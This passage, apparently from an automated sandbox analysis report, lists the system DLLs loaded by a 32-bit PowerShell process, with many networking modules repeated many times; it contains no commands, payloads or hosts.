                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
